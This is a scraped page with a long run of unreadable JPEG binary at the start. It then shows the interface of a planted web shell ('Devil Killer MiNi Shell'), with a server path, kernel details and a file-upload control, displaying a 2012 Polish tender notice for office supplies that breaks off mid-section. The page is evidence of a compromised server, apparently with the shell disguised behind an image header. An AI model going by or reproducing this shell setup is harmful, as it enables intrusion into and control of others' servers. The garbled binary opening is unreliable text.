JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/238581-N-2012.html

<p class="kh_header"><b>Kielce: Sukcesywna dostawa papieru i artykułów biurowych</b><br>
<b>Numer ogłoszenia: 238581 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa papieru i artykułów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa  papieru i art. biurowych dla 
Spółki z o.o.  Wodociągi Kieleckie  ul. Krakowska 64 w Kielcach  według poniższego zestawienia:

1.	Antyrama 60/90								-	  10 szt.
2.	Blok do biurwaru 100 kartek						-	100 szt.
3.	Blok szkolny A4 50 kartek						-	100 szt.
4.	Blok szkolny A5 50 kartek						-	100 szt.
5.	Blok techniczny A4							-	  10 szt.
6.	Breloczki na klucze							-	200 szt.
7.	Cienkopis czarny (z metalową końcówką)		            	-	200 szt.
8.	Cienkopis niebieski (z metalową końcówką)		        -	200 szt.
9.	Cienkopis zielony (z metalową końcówką)		            	-	200 szt.
10.	Cienkopis czerwony (z metalową końcówką)			-	200 szt.
11.	Cienkopis brązowy (z metalową końcówką)			-	  20 szt.
12.	Cienkopis / Piórko typ PIN 05-200, czarny, wodoodporny, do aparatu 
        (do liczenia kolonii bakterii)						 -	    1 szt.      
13.	Datownik plastikowy, automat samotuszujący		-	    5 szt.
14.	Długopis samoprzylepny							-	  10 szt.
15.	Długopis  z automatycznym wkładem, gumowym uchwytem-niebieski-500 szt.
16.	Długopis z wymiennym wkładem, obudowa biała z nadrukiem firmowym-1000 szt.
17.	Dziurkacz  pojedynczy z metalową podstawką i uchwytem  metalowym 
lub z niełamliwego plastiku; możliwość dziurkowania min. 25 kartek; wysuwany ogranicznik formatu						  -20 szt.
18.	 Dziurkacz wykonany z metalu; możliwość dziurkowania min. 
         40 kartek; wysuwany ogranicznik formatu		-	    5 szt.
19.	Dziurkacz  podwójny na minimalną ilość kartek	 (12)		-	    1 szt. 
20.	Etykiety samoprzylepne A4 - 105x57 mm; 1 op.=25 ark.	-	     3 op.
21.	Etykiety samoprzylepne A4 - 105x74 mm; 1 op.=25 ark.	-	     2 op.
22.	Flamastry ( po 4 kolory w kpl.)					-	  10 kpl.
23.	Folia do bindowania A4;200 mic.; 1op = 100 szt.		-	     2 op.
24.	Folia do laminarki  A4; 100 mic.; 1op = 100 szt.			-	     4 op.
25.	Folia do drukarki atramentowej A4;1op= 100 szt. (przeźroczysta 
             z jednej strony gładka z drugiej chropowata)		-	     1 op.
26.	Folder sztywny A4 (ofertówka)					-          100 szt.
27.	Grzbiety do bindowania - kolor granatowy O 6; 1op.=100szt	-	    2 op.
28.	Grzbiety do bindowania - kolor granatowy O 8; 1op.=100szt	-	    2 op.
29.	Grzbiety do bindowania - kolor granatowy O 10;1op.=100szt-	    2 op.
30.	Grzbiety do bindowania - kolor granatowy O 12,5; 1op.=100szt-	    2 op.
31.	 Grzbiety do bindowania - kolor granatowy O 14; 1op.=100szt.-	    2 op.
32.	 Grzbiety do bindowania - kolor granatowy O 16; 1op.=100szt.-	    2 op.
33.	 Grzbiety do bindowania - kolor granatowy O 18; 1op.=100szt-	    2 op.
34.	 Grzbiety do bindowania - kolor granatowy O 20; 1op.=100szt.-	    2 op.
35.	 Grzbiety do bindowania - kolor granatowy O 22; 1op.=100szt.-	    1 op.
36.	Grzbiety do bindowania - kolor granatowy O 25; 1op.=100szt.-              1 op.
37.	Gumki do ścierania wymiar 1,5-2 x 3,5-4 cm nie uszkadzające   powierzchni 
             papieru   przy ścieraniu					-         100 szt.
38.	Gumka recepturka							-	    3 kg
39.	Kalka ołówkowa, fioletowa 1op = 50 ark.			-	   2 op.
40.	Kalkulator biurowy o dużych klawiszach, 12-to pozycyjny wyświetlacz, 
funkcja sprawdzania i poprawy obliczeń (do 100 kroków), funkcja 
check&correct, obliczanie podatku VAT, suma całkowita, obliczanie 
procentowe, zmiana znaku, klawisz podwójnego i potrójnego zera   -	 10 szt.
41.	Kartki świąteczne z życzeniami,min.6 wzorów, razem z kopertami 
             (Boże Narodzenie, Wielkanoc)					-          350 szt. 
42.	Karton do bindowania A-4 250g., kolor niebieski;1op. = 100 szt.-	    4 op.
43.	Karton wizytówkowy A4, kolor biały i kremowy;1op. =20 szt.-	  40 op.
44.	Klej w sztyfcie 15 gram							-          100 szt.
45.	Klej w płynie 50 ml							-          150 szt.
46.	Klips do papieru - metalowy różne wymiary: 15,19,25,32,41,
51 (po  8 op. każdego wymiaru);1op.=12 szt,				-	  48 op.             
47.	Klips do akt-plastikowy do spinania dokumentów - biały;1op.=100 szt.-	    2 op.
48.	Kołonotatnik A4; 50 kartek						-	 10 szt.
49.	Kołonotatnik A5; 50 kartek						-	 10 szt.
50.	Koperta samoprzylepna C 6  biała;1op. = 1000 szt.			-	  30 op.
51.	Koperta samoprzylepna C 6 okno prawe, biała;1op = 1000 szt.	-	    5 op.
52.	Koperta C 5 biała  z paskiem HK;1op = 500 szt.			-	    5 op.
53.	Koperta B 4 biała  z paskiem HK 250x353;1op = 500 szt.		-	    2 op.
54.	Koperta biała B4  samoprzylepna z rozszerzonymi bokami i spodem 
             250x353x40							            -          250 szt.
55.	Koperta B4 biała z zabezpieczeniem powietrza 250x350		-          100 szt.
56.	Korektor w taśmie pokrywający każdy rodzaj tuszu; szerokość taśmy 
             min.5 mm; długość min.9 m					           -          180 szt.
57.	Korektor w pisaku -szybkoschnący płyn- z cienką metalową końcówką; 
     poj. min. 8 ml							            -	 50 szt.
58.	Koszulka foliowa na płyty CD						-          100 szt.
59.	Koszulka groszkowa na katalogi A4,170mic; 1op.=12 szt. 
            (przeźroczysta, grzbiet harmonijka na dużą ilość dokumentów)	            -             20 op.
60.	Linijka plastikowa przeźroczysta - 20 cm				-	 60 szt.                                                                   
61.	Linijka plastikowa przeźroczysta - 30 cm				-	 60 szt.    
62.	Linijka plastikowa przeźroczysta - 40 cm				-	 20 szt.    
63.	Litery samoprzylepne o wym.10x15mm (kolor niebieski)		-	   2 ark.
64.	Cyferki samoprzylepne o wym.10x15 mm (kolor niebieski)		-	   4 ark.
65.	Maczałka									-	 10 szt. 
66.	Mapa turystyczno-topograficzna - Kielce i okolice			-	 10 szt.
67.	Marker atramentowy, okrągła końcówka - możliwość pisania 
              po  każdego rodzaju powierzchni  o gr. 2,2 - 2,5 mm; czarny		-	 60 szt.
68.	Marker atramentowy, okrągła końcówka - możliwość pisania 
              na każdego rodzaju powierzchni  o gr. 2,2 - 2,5 mm; niebieski      	-	60 szt.
69.	Marker atramentowy, okrągła końcówka - możliwość pisania 
             na każdego rodzaju powierzchni o gr. 2,2 - 2,5 mm; zielony		-	60 szt.
70.	Marker atramentowy, okrągła końcówka - możliwość pisania 
            na każdego rodzaju powierzchni o gr. 2,2 - 2,5 mm; czerwony	           -	60 szt.
71.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka 
             -gr. linii pisania 0,8 - 1,2 mm; srebrny					-	60 szt.
72.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka		
    - gr. linii pisania 2,2 - 2,8 mm; czerwony				            -	12 szt. 
73.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka 
             - gr. linii pisania 2,2 - 2,8 mm; srebrny					-	60 szt.
74.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka
             - gr. linii pisania 0,8 - 1,2 mm; złoty				           -	60 szt.
75.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka
            - gr. linii pisania 2,2 - 2,8 mm - złoty					-	60 szt.
76.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka
            - gr. linii pisania 0,8 - 1,2 mm; czarny					-	60 szt.
77.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka 
            - gr. linii pisania 2,2 - 2,8 mm; czarny					-	60 szt.
78.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka
            - gr. linii pisania 0,8 - 1,2 mm - brązowy			           -	60 szt.
79.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka 
            - gr. linii pisania 2,2 - 2,8 mm; brązowy				           -	60 szt.
80.	Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka 
           - gr. linii pisania 2,2 - 2,8 mm; niebieski				           -	10 szt.
81.	Marker czarny do opisywania płyt CD					-	40 szt.
82.	Nabój do piór Pelikan  dł. 7 mm (po 5 szt.), niebieski			-	   5 op.
83.	Nabój do piór Pelikan  dł. 7 mm (po 5 szt.), czarny			-	   5 op.
84.	Notes samoprzylepny      75x75mm; 1bl.=100kart.			-	500 bl.
85.	Notes samoprzylepny  76x76mm mix kolor; 1bl.=400 kart.		-	  20 bl.
86.	Notes samoprzylepny 102x152, kratka; 1bl.=100 kart.			-	  80 bl.
87.	Notes samoprzylepny 50x38 mm					-	100 bl.
88.	Nożyczki ze stali nierdzewnej; dł. min. 20,5 cm				-	30 szt.
89.	Nożyczki krawieckie ze stali nierdzewnej dł. 8-10 cm			-	  4 szt.
90.	 Numerator, profesjonalny automat szkieletowy w metalowej obudowie, 
               samotuszujący z możliwością wielokrotnego powtarzania odbić
               (co najmniej sześciokrotnie)					           -	  1 szt.  
91.	Ofertówka / koszulka A4 wpinana, 40 mic. groszkowa; 1op = 100 szt.-	200 op.                                                                                                                                                                    
92.	Ofertówka /koszulka A5  wpinana, 40 mic. groszkowa; 1op = 100 szt.	-	    5 op.
93.	Ofertówka z nadrukiem firmowym A4  zgodnie z załączonym  wzorem
(Zał. nr 5 do SIWZ)                                     	                                       -     1000 szt.
94.	Okładka na dyplom A4 (kolor granat) sztywna okładka o fakturze skóry 
z ozdobną tasiemką; 80 szt. - złoty napis i logo zgodnie z załączonym 
wzorem ,   20 szt. - bez napisu	(Zał. nr 6 do SIWZ)                                -       100 szt.
95.	Okładka na dyplom A4 (kolor bordowy) sztywna okładka o fakturze 
skóry z ozdobną tasiemką; 80 szt. - złoty napis i logo zgodnie z załączonym 
wzorem,   20 szt. - bez napisu (Zał. nr 6 do SIWZ)                             	-	 100 szt.
96.	Okładka na dyplom A4 (kolor ciemna zieleń) sztywna okładka o fakturze 
skóry z ozdobną tasiemką; 						-	  60 szt.
97.	Ołówek z drewna, miękki z gumką					-	150 szt.			
98.		Ołówek automatyczny z gumowym uchwytem; wyposażony w wymienną
              gumkę; chowana prowadnica grafitu, gr. 0,5mm		           -	  80 szt.
99.		Papier ksero A4 80 g/m2, CIE 166; 1 ryza=500 ark.			-         3100 ryz
100.	Papier ksero A3 80 g/m2, CIE 166; 1 ryza=500 ark.	                       -	   50 ryz
101.	Papier ksero A2 80 g/m2; CIE 166  1 ryza = 500 ark.		-	   4 ryzy
102.	Papier komputerowy 240x12x1; 2000 składanek			-            10 kart.
103.	Papier komputerowy 240x12x2, kopia kolor; 900 składanek	-	    2 kart.
104.	Papier kancelaryjny A3 w kratkę; 1op=500 ark.			-	      1 op.
105.	Papier kolorowy, barwiony w masie, A4 80g mix, kolory intensywne: niebieski, 
                   żółty, czerwony, zielony, pomarańczowy; 1 ryza=100 ark.	           -	     5 ryz
106.	Papier A4 ksero, różne kolory pastelowe: niebieski, żółty, zielony, pomarańczowy,
     błękitny; 1ryza=500 ark. 						-	     5 ryz
107.	Papier pakowy szary 100x120 cm, 70g/m2 				-	200 ark.
108.	Papier fotograficzny A4-180 g/m2 błysk (po 50 szt)			-	     4 op.
109.	Papier A4 samoprzylepny, pastel. czerwony; 1 op.=25 ark.	-	     4 op.
110.	Papier A4 samoprzylepny, pastel. zielony; 1 op.=25 ark.		-	     4 op.
111.	Papier A4 samoprzylepny, pastel. niebieski; 1 op.=25 ark.		-	     4 op.
112.	Papier A4 samoprzylepny, pastel. żółty; 1 op.=25 ark.		-	     4 op.
113.	Papier A4 samoprzylepny, biały; 1 op.=100 ark.			-	     6 op.
114.	Pinezka tablicowa (po 50 szt.)					-	   10 op.
115.	Pinezka srebrna 1 op.=10 pudełeczek				-	     5 op.
116.	Piórnik na przybory do pisania; z pleksy z przegródkami, 3 wzory np.:
                   prostokątny, walec						            -	  20 szt.
117.	Półka na dokumenty w formacie A4					-	  60 szt.
118.	Pióro żelowe z wymiennym wkładem- gr.0,5 mm, czarne		-	200 szt.
119.	Pióro żelowe z wymiennym wkładem, gr. 0,5mm niebieskie	-	200 szt.
120.	Plan Miasta Kielce (aktualny, składany)				-	  15 szt.
121.	Poduszka do stempli 70x110 mm nasączona tuszem czarnym, czerwonym,
     zielonym; obudowa metal						-	    5 szt.
122.	Przekładki kartonowe wykonane z grubego, ekologicznego kartonu 190 g/m2   
      1/3 A4 niebieskie;1 op.=100 szt.                                                          -	   25 kpl.
123.	Przekładka alfabetyczna A4 kartonowa; kolorowa A-Z		-	     5 kpl.
124.	Przekładka numeryczna A4 kartonowa 1-31			-	     5 kpl.
125.	Pudełko organizer na 100 szt. płyt CD, zamykane			-	    3 szt.
126.	Reklamówka firmowa większy rozmiar zgodnie z załączonym  wzorem
     (Zał. nr 7 do SIWZ) 	                                                                     -  	 900 szt.
127.	Reklamówka firmowa mniejszy rozmiar zgodnie z załączonym  wzorem
     (Zał. nr 7 do SIWZ)						           -	 500 szt.
128.	Rysiki do ołówków, twardość HB, 2B; gr. 0,5mm;1op.=12 szt.	-	  50 op. 
129.	Rysiki do ołówków, twardość HB, 2B  gr. 0,7mm;1op.=12 szt.	-	  10 op.
130.	Rolka kasowa, termiczna  szer.57mm, dł.30 m.			-	  12 szt.
131.	Rozszywasz								-	  20 szt.
132.	Segregator A4/75 z wymienną etykietą, okleina PCV na zewnątrz 
                   i wewnątrz segregatora; brzegi dolne okucie metalowe, różne kolory-        600 szt.
133.	Segregator A4/50 z wymienną etykietą okleina PCV na zewnątrz 
                   i wewnątrz segregatora; brzegi dolne okucie metalowe, różne kolory  - 	600 szt.
134.	Segregator A5/75 z wymienną etykietą okleina PCV na zewnątrz 
                   i wewnątrz segregatora; brzegi dolne okucie metalowe, różne kolory-	100 szt.
135.	Segregator na Dziennik Ustaw					-	  20 szt.
136.	Segregator na Monitor Polski					-	  10 szt.
137.	Skoroszyt tekturowy pełny A4					-	800 szt.
138.	Skoroszyt  tekturowy pełny oczko A4				-         1000 szt.
139.	Skoroszyt tekturowy ? oczko  A4					-         1500 szt.
140.	Skoroszyt zawieszkowy ? A4					-	200 szt.
141.	Skoroszyt plastikowy A4 wpinany, różne kolory			-         1500 szt.
142.	Skoroszyt plastikowy miękki A4, różne kolory			-	200 szt.
143.	Skorowidz A4, 96 kartek; op. introlig.				-	  10 szt.
144.	Skorowidz A5, 96 kartek; op. introlig.				-	  10 szt.
145.	Spinacz krzyżowy na dokumenty					-	     5 op.
146.	Spinacze R-28; 1op. = 10 pudełeczek				-	   20 op.
147.	Spinacze R-50; 1 op. = 10 pudełeczek				-	     5 op.
148.	Sznurek konopny (waga  1op.= 0,5 kg.)				-	    4 szt.
149.	Sznurek dratwa (waga 1 op.=0,5 kg.)				-	    4 szt.
150.	Tablica korkowa, 60 x 90; rama drewniana				-	  10 szt.
151.	Taśma klejąca, 24 mm x 30 mb					-	200 szt.
152.	Taśma pakowa szara, 48 cm x 50 mb				-	   60 szt.
153.	Taśma elektroizolacyjna, wodoodp.(wym.0,13mmx15mmx10m)niebieska-    5 szt.
154.	Taśma elektroizolacyjna, wodoodp.(wym.0,13mmx15mmx10m)czerwona-   5 szt.
155.	Taśma elektroizolacyjna, wodoodp.(wym.0,13mmx15mmx10m)żółta  -         5 szt.
156.	Taśma elektroizolacyjna, wodoodp.(wym.0,13mmx15mmx10m)zielona-       5 szt.
157.	Taśma elektroizolacyjna, wodoodp.(wym.0,13mmx15mmx10m)czarna-        5 szt.
158.	Taśma pakowa papierowa szara 60mm x 50m			-               4 szt.
159.	Taśma papierowa żółta 50x33 (malarska)				-               5 rolek
160.	Taśma papierowa żółta (wąska, malarska)		               	-	    5 rolek
161.	Taśma do metkownicy (jednorzędna)				-              1 rolka
162.	Taśma dwustronnie przylepna, wąska 1,5 - 2,5 mm	            -	   20 szt.
163.	Taśma dwustronnie przylepna, szeroka		            	-	   10 szt.
164.	Teczka tekturowa A4, firmowa, lakierowana UV jednostronnie,
                    gram.250 druk w pełnym kolorze 4+0	                      	           	-           500 szt.
165.	Teczka do podpisu A4 grzbiet harmonijka; 15 kart; oprawa nitro, 
                    kolory do wyboru							-             20 szt.
166.	Teczka na rzep A4 szer. grzbietu min. 4 cm; okleina PCV	          	-             30 szt.
167.	Teczka z gumką A4 kolor laminowana  min. 3 kolory do wyboru	    -	300 szt.
168.	Teczka tekturowa wiązana A4					    -	300 szt.
169.	Teczka A4 z klipem, klip o szer. min. 9 cm				    -	  50 szt.
170.	Teczka A5 z klipem, klip o szer. min. 9 cm				-	  40 szt.
171.	Teczka twarda na rzep lub tasiemki gr. min. 5,0 cm		-	  40 szt.
172.	Temperówka metalowa z metalowym ostrzem			-	  40 szt.
173.	Tusz do stempli o poj.min. 25 ml. kolory zielony, czerwony, czarny-            15 szt.
174.	Wąsy do skoroszytów - plast. ;1op.=25 szt				-	   20 op.
175.	Wizytownik na min. 96 wizytówek, 3 kolory do wyboru		-	    6 szt.
176.	Wkład do długopisu wielkopojemny, gruby, metalowy,czarny	-	200 szt.
177.	Wkład do długopisu wielkopojemny, gruby, metalowy, niebieski	-	200 szt.
178.	Wkład długopisu zwykły z grubą końcówką, czarny			-	200 szt.
179.	Wkład do długopisu firmowego,czarny(wkłady muszą pasować do
                  długopisów oferowanych w poz.16)	                  		           -	200 szt.
180.	Wkład do długopisu zwykły z grubą końcówką, niebieski		-	200 szt.
181.	Wkład do długopisu firmowego,niebieski (wkłady muszą pasować do 
                   długopisów oferowanych w poz.16)				           -	200 szt.
182.	Wkład do długopisu popularny, czarny				-	  50 szt.
183.	Wkład do długopisu popularny, niebieski				-	  50 szt.
184.	Wkład do długopisu żelowy, gr. 0,5 mm, czarny			-	150 szt.
185.	Wkład do długopu żelowy, gr. 0,5 mm, niebieski			-	150 szt.
186.	Zakreślacz żółty							-	  60 szt.
187.	Zakreślacz zielony							-	  60 szt.
188.	Zakreślacz różowy						           -	  60 szt.
189.	Zakreślacz pomarańczowy					           -	  60 szt.
190.	Zakreślacz  niebieski							-	  60 szt.
191.	Zeszyt A5 16 kart. w kratkę, miękka okładka			-	  60 szt.
192.	Zeszyt A5 32 kart. w kratkę, miękka okładka			-	  60 szt.
193.	Zeszyt A5 60 kart. w kratkę, miękka okładka			-	  60 szt.
194.	Zeszyt A5 80 kart. w kratkę, miękka okładka			-	  60 szt.
195.	Zeszyt A5 96 kart. w kratkę, twarda okładka			-	  60 szt.
196.	Zeszyt A4 96 kart. w kratkę, twarda okładka			-	  60 szt.
197.	Zeszyt B5 160 kart. w kratkę, twarda okładka			-	  30 szt.
198.	Zeszyt A4 200 kart. w kratkę, twarda oprawa, kartki zszywane	-	  10 szt.
199.	Zeszyty A4 100 kart. w linię, twarda oprawa				-	    5 szt.
200.	Znaczniki samoprzylepne plastikowe (zakładka indeksująca) kolorowe-	 200 op.
201.	Zszywacz metalowy w plastikowej obudowie; zszywa min. 15 kartek -	  30 szt.
202.	Zszywacz zszywający jednorazowo 130 - 260 kartek		-	    5 szt.
203.	Zszywacz mini							-	    2 szt.
204.	Zszywki (po 1000 szt.), 1 op. zb.=10 pudełeczek- 24/6	            -	   30 op.
205.	Zszywki (po 1000 szt.), 1 op. zb.=10 pudełeczek- 23/24		-	     5 op.
206.	Zszywki (po 1000 szt.), 1 op. zb.=10 pudełeczek; do zszywacza mini-	     2 op.
207.	Płyn do tablic suchościeralnych; 1op.=250 ml.			-	     7 op.  
208.	Marker suchościeralny dozowany za pomocą tłoczka 4 kolory + gąbka-	  18 kpl.    
209.	Blok do tablicy typu Flipchart 60x80,50 k.				-	    7 szt.
210.	Teczka zawieszkowa do szuflad					-	400 szt.                                                                                                                                                                                                                                                                   
211.	Etykieta do drukarki kol. biały 210x148				-	     8 op.
212.	Karton archiwizacyjny						-	  10 szt.
213.	Półka siatkowa na dokumenty (3P),metal				- 	    3 szt.
214.	Teczki na akta osobowe w kolorze czarnym lub zielonym - marmurek -      40 szt.
Uwagi:
1. Do oferty należy załączyć wzór każdego towaru z nadanym numerem porządkowym    
  wyszczególnionym w SIWZ.

2.	Do oferty należy dołączyć spis przekazanych materiałów biurowych. 
3.	Wzory należy złożyć w Biurze Obsługi Klienta w terminie składania ofert.
4.	Przesyłka ze wzorami winna być zaadresowana tak jak oferta z dopiskiem pn. Sukcesywna dostawa papieru i art. biurowych  - wzór. 
5.	Dokumentację postępowania (ofertę wraz ze wszystkimi załącznikami w tym ze wzorami ) Zamawiający przechowuje przez okres 4 lat od dnia zakończenia postępowania o udzielenia zamówienia, w sposób gwarantujący jej nienaruszalność (art.97 ust.1 ustawy Pzp).
6.	Na wniosek Wykonawcy, którego oferta nie została wybrana, Zamawiający zwróci załączone do oferty wzory produktów (art.97 ust.2 ustawy Pzp). Zwrot wzoru nastąpi poprzez  odebranie z siedziby Spółki lub przesłanie na koszt Wykonawcy.
7.	Pozostałe warunki przetargowe:
a) nie dopuszcza się możliwości składania ofert częściowych,
b) nie dopuszcza się możliwości składania ofert wariantowych,
c) nie dopuszcza się rozliczania zamówienia w walutach innych niż polski złoty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.14.12.00-1, 22.80.00.00-8, 44.11.15.20-7, 37.82.32.00-5, 39.29.80.00-7, 39.24.12.00-5, 18.93.71.00-7, 22.11.43.00-7, 22.90.00.00-9, 44.17.60.00-4, 39.54.11.30-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Postępowanie nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
